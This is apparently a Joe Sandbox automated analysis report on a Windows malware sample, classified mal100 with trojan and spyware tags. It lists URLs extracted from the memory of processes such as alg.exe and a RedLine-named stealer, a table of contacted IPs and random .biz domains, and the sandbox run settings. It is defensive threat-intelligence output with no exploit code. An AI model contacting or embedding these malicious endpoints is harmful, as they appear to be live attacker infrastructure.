00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmp | false
http://13.251.16.150/(UF | alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmp | false
http://tempuri.org/ | build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id20ResponsehD | build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id2Response | build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmp | false
http://18.141.10.107/vrnakrkG | alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id21Response | build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmp | false
http://54.244.188.177/biwgwfhxqj | alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmp | false
http://172.234.222.138/vfgrjxuhtsfioI | alg.exe, 00000005.00000003.2461628968.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2463088351.00000000004A3000.00000004.00000020.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id13LR | build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmp | false
http://3.94.10.34/fgdugwxcbebce | alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2574988059.000000000046C000.00000004.00000020.00020000.00000000.sdmp | false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id13ResponsehD | build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmp | false
http://54.244.188.177/txk | alg.exe, 00000005.00000003.2549986437.000000000046C000.00000004.00000020.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id5LR | build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmp | false
http://44.221.84.105:80/rkqsyeybt | alg.exe, 00000005.00000003.2410749727.00000000004A3000.00000004.00000020.00020000.00000000.sdmp | false
http://18.141.10.107/nhvixgstciqyn | alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                                                                                                                                                                                                                                  http://18.141.10.107:80/afeeapyprlxrxabkalg.exe, 00000005.00000003.2958285127.00000000004AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    http://3.94.10.34:80/cngodyfv0alg.exe, 00000005.00000003.3108228485.00000000004AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      http://13.251.16.150:80/ghraajhdoyalg.exe, 00000005.00000003.2726508164.00000000004A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                        http://54.244.188.177/bimwjsl4microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                          http://44.221.84.105/alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                            https://api.ip.sb/ipNative_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                                                                                                                              http://208.100.26.245/cpggjalg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                http://165.160.15.20:80/ahktjonxxxwalg.exe, 00000005.00000003.2586093883.00000000004A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                  http://165.160.15.20/4s/alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id24Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/rubmfuralg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                        http://208.100.26.245/syalg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                          http://165.160.15.20/mwixalg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                            http://172.234.222.138/eybmhvtkalg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                              http://44.221.84.105/s3alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/xalg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                  http://172.234.222.138/vfgrjxuhtsfioalg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id14LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                      http://tempuri.org/Entity/Id6LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingbuild.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                          http://34.211.97.45/cgfpujhdoalg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                            http://172.234.222.138/qntnralg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                              http://tempuri.org/Entity/Id5Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                http://18.208.156.248/hbbreaeoihjkoswalg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                  http://82.112.184.197/dltqfingsalg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id11ResponsehDbuild.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                      http://tempuri.org/Entity/Id10Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                        http://tempuri.org/Entity/Id8Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                          http://208.100.26.245:80/ywcfdqaloklmslqoalg.exe, 00000005.00000003.2499966144.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2498837288.00000000004A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                            http://tempuri.org/Entity/Id22LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                              http://44.221.84.105/snxddmvolovsghkalg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                http://172.234.222.138:80/qntnralg.exe, 00000005.00000003.2447576365.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2448344378.00000000004AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  http://54.244.188.177/exvjfnyxjxwqXwLalg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    http://13.251.16.150/ghraajhdoalg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                      http://208.100.26.245/gs#alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://208.100.26.245/Falg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 165.160.15.20 | myups.biz | United States | 19574 | CSCUS | false |
| 3.254.94.185 | uaafd.biz | United States | 16509 | AMAZON-02US | false |
| 3.94.10.34 | ytctnunms.biz | United States | 14618 | AMAZON-AESUS | false |
| 34.246.200.160 | tbjrpv.biz | United States | 16509 | AMAZON-02US | false |
| 172.234.222.143 | przvgke.biz | United States | 20940 | AKAMAI-ASN1EU | false |
| 18.208.156.248 | damcprvgv.biz | United States | 14618 | AMAZON-AESUS | true |
| 34.211.97.45 | vrrazpdh.biz | United States | 16509 | AMAZON-02US | false |
| 208.100.26.245 | gytujflc.biz | United States | 32748 | STEADFASTUS | false |
| 35.164.78.200 | nqwjmb.biz | United States | 16509 | AMAZON-02US | false |
| 172.234.222.138 | fwiwk.biz | United States | 20940 | AKAMAI-ASN1EU | true |
| 165.160.13.20 | unknown | United States | 19574 | CSCUS | false |
| 51.195.88.199 | s82.gocheapweb.com | France | 16276 | OVHFR | false |
| 212.162.149.53 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true |
| 72.52.178.23 | wxgzshna.biz | United States | 32244 | LIQUIDWEBUS | false |
| 44.221.84.105 | hehckyov.biz | United States | 14618 | AMAZON-AESUS | false |
| 85.214.228.140 | dlynankz.biz | Germany | 6724 | STRATOSTRATOAGDE | false |
| 54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false |
| 13.251.16.150 | sxmiywsfv.biz | United States | 16509 | AMAZON-02US | false |
| 47.129.31.212 | xlfhhhm.biz | Canada | 34533 | ESAMARA-ASRU | false |
                                                                                                                                                                                                                                                                                                                                                                                                              18.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              vyome.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                              43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              warkcdu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549472
Start date and time: 2024-11-05 17:01:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 42
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AENiBH7X1q.exe (renamed because the original name is a hash value)
Original Sample Name: 78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@45/170@173/23
EGA Information:
• Successful, ratio: 69.2%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Native_Redline_BTC.exe, PID 1900 because it is empty
• Execution Graph export aborted for target TrojanAIbot.exe, PID 5628 because it is empty
• Execution Graph export aborted for target microsofts.exe, PID 1816 because there are no executed functions
• Execution Graph export aborted for target server_BTC.exe, PID 1352 because it is empty
• HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
